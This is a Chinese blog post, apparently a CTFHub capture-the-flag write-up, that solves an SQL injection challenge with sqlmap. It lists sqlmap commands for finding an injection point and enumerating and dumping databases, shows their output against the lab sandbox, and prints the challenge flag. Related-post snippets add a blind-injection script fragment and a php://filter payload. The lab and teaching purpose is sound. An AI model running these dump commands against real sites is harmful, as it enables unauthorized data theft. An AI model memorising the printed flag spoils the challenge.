CTFHub--SQL注入--injection sqlmap版

于 2024-09-18 21:39:10 发布
阅读量262 收藏 2
点赞数 4
文章标签: sql 数据库
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2402_82644071/article/details/142344081
版权

1:获取靶场信息

打开目标靶场,打开kali,输入我们的URL

back-end DBMS: MySQL >= 5.0.12 (MariaDB fork)
banner: '10.1.44-MariaDB-0+deb9u1'
current user: 'ctfhub@127.0.0.1'
current database: 'ctfhub'

可以看到数据库名是CTFhub,flag应该就在里面

2:工具6连注入(附属一张别人的总结)

1.   sqlmap -u  "http://www.xx.com?id=x"    【查询是否存在注入点

2.     --dbs         【检测站点包含哪些数据库

3.     --current-db    【获取当前的数据库名

4.     --tables -D "db_name"  【获取指定数据库中的表名 -D后接指定的数据库名称

5.     --columns  -T "table_name" -D "db_name"  【获取数据库表中的字段

6.     --dump -C "columns_name" -T "table_name" -D "db_name"  【获取字段的数据内容
———————————————
                        
原文链接:https://blog.csdn.net/qq_37964989/article/details/84109094

7:然后注入找到下面的表


Database: ctfhub
[2 tables]
+------+
| flag |
| info |
+------+

知道表了我们就直接找吧得到

75  sqlmap -u"http://challenge-538e39ab5040aaa9.sandbox.ctfhub.com:10800/index.php?id=1" -D ctfhub -T flag --columns

Database: ctfhub
Table: flag
[1 column]
+--------+--------------+
| Column | Type         |
+--------+--------------+
| flag   | varchar(255) |
+--------+--------------+

找一下字段里的flag

 sqlmap -u"http://challenge-538e39ab5040aaa9.sandbox.ctfhub.com:10800/index.php?id=1" -D ctfhub
 -T flag -C flag --dump

Database: ctfhub
Table: flag
[1 entry]
+----------------------------------+
| flag                             |
+----------------------------------+
| ctfhub{41aae0f32ad0245468d2b351} |
+----------------------------------+

bp.o
关注
CTFHub(1) SQL注入题目injection
weixin_49385916的博客
08-08 1191
CTFHub(1) SQL注入题目injection 现分享CTFHub上的一道SQL注入题目injection 方法:使用sqlmap进行注入 如下图,可见一个GET传参,可能为SQL注入。 进入sqlmap文件夹,使用sqlmap进行注入。 sqlmap运行结果如下 可知存在SQL注入漏洞,使用sqlmap爆出所有数据库 sqlmap运行结果如下 由于information_schema为系统数据库,可知当前数据库ctfhub 然后使用sqlmap爆出ctfhub数据库中的表 sqlmap运行结
二、CTF-Web-SQL注入(记录CTF学习)
qq_27920699的博客
12-16 431
个人CTF学习之路
2017-赛客夏令营-Web-injection
抒情诗
05-08 190
看题目名字,应该是一道SQL注入。首先,根据下面的payload,1=1时返回为错误界面,1=2时返回正确界面,判断是数字型布尔盲注。使用sqlmap可以解决,这里方便起见就不写脚本浪费时间了。跑出结果。
CTFHub SQl注入 时间盲注(sqlmap
赤城封雪的博客
08-07 5168
CTFHub SQl注入 时间盲注(sqlmap) 0x00 简单介绍 这篇文章主要通过 CTFHub 时间盲注案例简单记录一下 sqlmap 的使用流程。 参考:sqlmap用户手册 | WooYun知识库 (xmd5.com) sqlmap 的功能: 1、判断可注入的参数 2、判断可以用那种SQL注入技术来注入 3、识别出哪种数据库 4、根据用户选择,读取哪些数据 (具体过程可见文章末尾案例) sqlmap支持五种不同的注入模式: 1、基于布尔的盲注,即可以根据返回页面判断条件真假的注入。 2
CTFHub技能树-SQL注入-整数型注入
最新发布
m0_74313947的博客
09-15 400
思路:注入点->库->表->列->数据首先使用order by探测有几列我们发现order by 2 的时候有回显,到了order by 3 的时候就没有回显了,所以列数为2然后使用联合注入得到用户名与数据库名。
sqlmap工具的实操--sql注入
weixin_66839513的博客
04-01 2851
sql注入原理就是将恶意的sql语句通过表单或者url拼接到web后端的查询语句中,绕过后端的认证,在后端被服务器执行恶意的sql语句,获取到数据库的权限,从而对数据库进行执行操作,造成数据的篡改及泄露。
SQL注入万字详解,基于sqli-labs(手注+sqlmap
2401_82985722的博客
07-21 979
SQL 是 Structured Query Language 的缩写,中文译为“结构化查询语言”。SQL 是用于访问和处理数据库的标准的计算机语言。SQL 指结构化查询语言SQL 使我们有能力访问数据库SQL 是一种 ANSI 的标准计算机语言Web应用程序对用户输入的数据校验处理不严或者根本没有校验,致使用户可以拼接执行SQL命令。可能导致数据泄露或数据破坏,缺乏可审计性,甚至导致完全接管主机。在SQL数据库中,每条语句是以;
CTFHub Web真题(3星-6星)
qq_43936524的博客
05-20 1981
三星难度Web题 afr-2 afr-1 提示文件包含 输入hello 回显hello world! 输入flag 回显no no no 又试了几个输入无回显 可以猜测输入的内容添加了后缀后显示出了文件内容 采用 php://filter/read=convert.base64-encode/resource=flag 成功读取flag.php内容 解码后得到flag n1book{afr_1_solved} checkin 扫目录只扫出了index.php一个页面,抓取响应包发现有flag字段
CTFHUB历年真题练习
qq_51558360的博客
10-11 1420
WebsiteManger 考点 布尔盲注、SSRF 尝试了一般登录方法没有反应。查看源码发现sql注入的利用点在图片上 盲注脚本 import string from requests import * allstr = '0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ!"#$%&\'()*+,-./:;<=>?@[\]^_`{|}~' myurl = 'http://challenge-1993b
CTFHUB-web-SQL注入
ookami6497的博客
11-29 818
CTFHUB SQL
CTFHUB-WEB-SQL注入
K_ShenH的博客
06-09 1237
CTFHUB-WEB-SQL注入
CTF---Web---SQL注入---02---sqlmap常规模式
qq_22160557的博客
07-29 438
文章目录前言一、题目描述二、解题步骤1、id查询2、sqlmap跑URL总结 前言 题目分类: CTF—Web—SQL注入—02—sqlmap常规模式 一、题目描述 题目:sql注入 链接:192.168.87.184 提示:order 二、解题步骤 1、id查询 Step1:根据id查询一下,url变成了 http://192.168.87.184/?order=id&button=submit 由链接可知,此为get传参。 2、sqlmap跑URL Step2:利用kali中的sqlma
CTF---Web---SQL注入---01---万能密码+sqlmap
qq_22160557的博客
07-29 3719
文章目录前言一、题目描述二、解题步骤1. 万能密码登录2. sqlmap爆库3. 爆表4. 爆列5. 爆字段三、总结 前言 题目分类: CTF—Web—SQL注入—01—万能密码+sqlmap 一、题目描述 题目:SQL注入 链接:192.168.87.172 二、解题步骤 1. 万能密码登录 Step1:尝试万能密码:user=‘=’,pass=‘=’,输入后登录成功,注入点在此 2. sqlmap爆库 Step2:源代码中提示,提交方法为POST,所以此题为sqlmap的post注入,采用kai
CTF---Web---SQL注入---07---注入点+level
qq_22160557的博客
07-31 484
文章目录前言一、题目描述二、解题步骤1、寻找注入点2、请求包保存3、sqlmap爆破三、总结 前言 题目分类: CTF—Web—SQL注入—07—注入点+level 一、题目描述 题目:添加备注 二、解题步骤 1、寻找注入点 Step1:本题在常规注入的地方,是无法注入的:但是这是下面有个添加备注的地方 2、请求包保存 Step2:添加备注后,抓包后,保存为txt文件 3、sqlmap爆破 Step3:丢到sqlmap中跑就行了。 注入点为id,注入类型为以时间为基础的时间盲注。 Step4:爆
sqlalchemy JSON 字段写入时中文序列化问题
llc的博客
09-12 445
_table_args__ = ({"comment": "表名称"})...extra = Column(JSON, comment="其他属性")...
SQL(结构性查询语句)
2301_78693337的博客
09-11 524
以上就是今天要讲的内容,本文介绍了基础的SQL语法使用,而sql还提供了大量能使我们快速便捷地处理数据的函数和方法等着我们探索。
解锁SQL无限可能 | 基于SQL实现的一种时序数据的波峰个数检测算法
石榴姐yyds
09-14 1335
序列数据是按照时间进行采集,其中400个点一个周期,一条数据共10个周期,即4000个点。首先针对序列数据判断每个周期是否存在波峰,并在存在波峰的情况下进行波峰形状识别。5)业务指标体系该如何建设?如果觉得本篇文章对你还有点帮助,那么不妨也可以选择去看看我的博客专栏文章,里面内容更精彩。业务阶段的模型该如何建设?7)指标发生异常,该如何排查?11)数据部门如何与业务部门沟通,并规划指引业务需求?9)数仓团队应如何体现自己的业务价值,讲好数据故事?文章不限于以上内容,有新的想法也会及时更新到该专栏。
经典sql题(一)求连续登录不少于三天用户
m0_58076578的博客
09-14 912
去重提取日期查询:提取每个用户的唯一登录日期。结果表table1:显示每个用户的唯一日期。为每个用户生成序列号查询:为每个用户的日期生成序号,并计算date2。结果表table2:显示用户的日期和对应的date2。步骤使用函数,按照日期顺序为每个用户的登录日期分配一个序号。例如,对于用户 ID = 1,假设他们的日期是2023-10-012023-10-02和2023-10-03将为它们生成序号 1、2 和 3。date2是通过将每个日期减去它的序号得到的。这个操作的目的是为了检测连续的日期。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值